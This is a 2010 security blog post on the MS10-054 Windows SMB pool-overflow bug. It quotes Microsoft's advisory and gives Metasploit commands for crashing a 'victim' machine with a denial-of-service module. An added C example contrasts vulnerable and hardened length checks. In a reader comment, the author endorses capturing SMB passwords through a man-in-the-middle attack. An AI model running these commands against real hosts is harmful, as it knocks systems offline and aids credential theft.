ClsHack:Computer Security Blog    

[MS10-054] Metasploit: Remote DoS on Microsoft SMB Server Trans2


And our friend g-laurent, famous for his exploits, has discovered a new vulnerability in the Windows SMB protocol :P

What can we do with this exploit o.O ?

From the Microsoft site:

Vulnerability details

In order to exploit CVE-2010-2550, the attacker must have read permission on a SMB share on the target system. This implies that the attacker is authenticated, or that the target allows anonymous access to network shares (this is a default configuration only on Windows XP with later platforms requiring authentication by default).


By sending a specially crafted SMB request to the target, an attacker with read access could cause a kernel pool block to be overrun. This is due to an attacker-provided length being used as the size value in an allocation call. If an attacker specifies a small size value, the system will later write data to this buffer, which will corrupt the adjacent pool block(s). The data used in the overwrite comes from the disk or file system on the target machine.
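The mistake Microsoft describes (a pool allocation sized from a client-supplied length, then filled with data of the real size) is modelled below as an added C example; it is not the original post's code nor Windows' SMB code, and `handle_queryfs_vulnerable`, `handle_queryfs_hardened`, `claimed_len` and the sample buffer are assumptions. The vulnerable path only computes how far the copy would overrun instead of performing it, so the model stays memory-safe.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the bug class (not Microsoft's code): the server sizes
 * an allocation from a length the client supplies, then copies the real
 * file-system response into it. */

enum { STATUS_OK = 0, STATUS_INVALID_PARAMETER = 1 };

typedef struct {
    int status;        /* result returned to the client */
    size_t alloc_len;  /* size of the buffer that was allocated */
    size_t overrun;    /* bytes the copy would land past the buffer end */
} result_t;

/* Constructed stand-in for the 64-byte response the server writes back. */
static const uint8_t sample_fs_info[64] = { 0x41 };

/* Vulnerable pattern: allocation size comes from the request, copy size from
 * the data. The copy is NOT performed; only the overrun is computed. */
result_t handle_queryfs_vulnerable(uint16_t claimed_len,
                                   const uint8_t *fs_data, size_t data_len) {
    result_t r = { STATUS_OK, claimed_len, 0 };
    (void)fs_data;
    if (data_len > claimed_len)        /* small claimed_len -> pool overrun */
        r.overrun = data_len - claimed_len;
    return r;
}

/* Hardened pattern: validate the untrusted length against the data that will
 * actually be written BEFORE allocating, and reject the request otherwise. */
result_t handle_queryfs_hardened(uint16_t claimed_len,
                                 const uint8_t *fs_data, size_t data_len) {
    result_t r = { STATUS_INVALID_PARAMETER, 0, 0 };
    if (claimed_len < data_len)
        return r;                      /* never allocate, never copy */
    uint8_t *buf = malloc(claimed_len);
    if (!buf)
        return r;
    memcpy(buf, fs_data, data_len);    /* data_len <= claimed_len: in bounds */
    r.status = STATUS_OK;
    r.alloc_len = claimed_len;
    free(buf);
    return r;
}
```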

So, we cause a blue screen :D

Affected systems:

Windows:

  • 2000
  • XP
  • 2003
  • Vista
  • 2008
  • 7
  • 2008R2

Let's see how to use this exploit with Metasploit :D

Update Metasploit:
sudo svn update
Use the exploit:
use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
Set the victim's IP:
set RHOST 192.168.1.154
The share (in my case, Users):
set SMBSHARE Users
And launch the exploit:
exploit

If all goes well, you'll get the screen shown in the image above :D


This entry was posted on Thursday, August 12th, 2010 at 12:17 pm and is filed under Hacking, Software.

  • wewe

    sorry, but it doesn't work remotely, right …………

  • clshack_

    right ….

  • Honik

    Hi clshack…
    I wanted to know whether, through a MITM attack and then analysing the right packets, you can recover the password of shared folders on Windows.. so I suppose the SMB / SMB2 password, so as to be able to get into the shared resources.. or is there another way?
    Thanks and bye

  • clshack_

    yes, you can recover it; I recommend looking at Metasploit :)

    And this tutorial:

    http://www.clshack.it/metasploit-how-to-auxiliary-scanner.html